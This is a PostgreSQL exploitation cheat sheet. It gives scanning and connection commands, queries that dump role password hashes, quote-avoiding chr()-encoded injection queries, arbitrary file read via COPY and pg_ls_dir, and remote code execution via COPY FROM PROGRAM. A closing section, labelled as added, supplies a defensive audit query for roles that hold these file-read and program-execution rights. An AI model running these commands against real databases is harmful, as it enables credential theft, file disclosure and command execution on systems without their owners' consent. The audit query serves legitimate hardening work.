PostgreSQL enumeration and exploitation

Initial enumeration

nmap -vv -p 5432 -sT --script=+pgsql* <ip>

Connecting to a PostgreSQL database

psql "dbname=<db_name> host=<ip> user=<username> password=<password> port=5432"

Enumerating a database

  • Get version:
SELECT version();
  • Get current database:
SELECT current_database();
  • Get current user:
SELECT current_user;
  • Get current user's password hash:
SELECT rolpassword FROM pg_catalog.pg_authid WHERE rolname=current_user;
  • List all users:
SELECT rolname FROM pg_catalog.pg_authid ORDER BY 1;
  • Get default user's password hash:
SELECT rolpassword FROM pg_catalog.pg_authid WHERE rolname=(chr(112)||chr(111)||chr(115)||chr(116)||chr(103)||chr(114)||chr(101)||chr(115)) -- "postgres" user
  • List tables:
SELECT table_schema,table_name FROM information_schema.tables ORDER BY 1;
  • List table columns:
SELECT column_name FROM information_schema.columns WHERE table_name='<table_name>' ORDER BY 1;
  • Search for tables whose name contains "user" (pattern built from chr() to avoid quotes):
SELECT table_schema,table_name FROM information_schema.tables WHERE lower(table_name) LIKE chr(37)||chr(117)||chr(115)||chr(101)||chr(114)||chr(37) ORDER BY 1 LIMIT 1 OFFSET 0;

Arbitrary File Read (AFR)

  • Directory listing:
SELECT pg_ls_dir('<path>');
  • Read a file:
DROP TABLE IF EXISTS temp;
CREATE TABLE temp(t TEXT);
COPY temp FROM '<file_path>';
SELECT * FROM temp;

Remote Code Execution (RCE)

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output TEXT);
COPY cmd_exec FROM PROGRAM '<payload>';
SELECT * FROM cmd_exec;
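Added defensive check (not part of the original cheat sheet): the file-read COPY and COPY FROM PROGRAM primitives above work only for superusers or for members of the predefined roles pg_read_server_files and pg_execute_server_program (available since PostgreSQL 11). This audit query, written here as an example, lists every non-system role that holds any of those capabilities, directly or through role membership, so the exposure can be reviewed and trimmed.

```sql
-- Audit: which roles could run COPY FROM '<file>' or COPY FROM PROGRAM?
-- Assumes PostgreSQL 11 or newer, where the predefined roles
-- pg_read_server_files and pg_execute_server_program exist.
SELECT r.rolname,
       r.rolcanlogin,
       r.rolsuper,
       -- 'MEMBER' also covers indirect membership through other roles
       pg_has_role(r.oid, 'pg_read_server_files', 'MEMBER')      AS can_read_server_files,
       pg_has_role(r.oid, 'pg_execute_server_program', 'MEMBER') AS can_run_programs
FROM pg_catalog.pg_roles r
WHERE r.rolname NOT LIKE 'pg\_%'          -- skip the built-in pg_* roles
  AND (r.rolsuper
       OR pg_has_role(r.oid, 'pg_read_server_files', 'MEMBER')
       OR pg_has_role(r.oid, 'pg_execute_server_program', 'MEMBER'))
ORDER BY r.rolsuper DESC, r.rolname;
```

Any login role returned here that is not a dedicated administrative account is a candidate for REVOKE of the listed role membership. On PostgreSQL 10 and earlier the two predefined roles do not exist, so the query errors out; there only rolsuper grants these primitives.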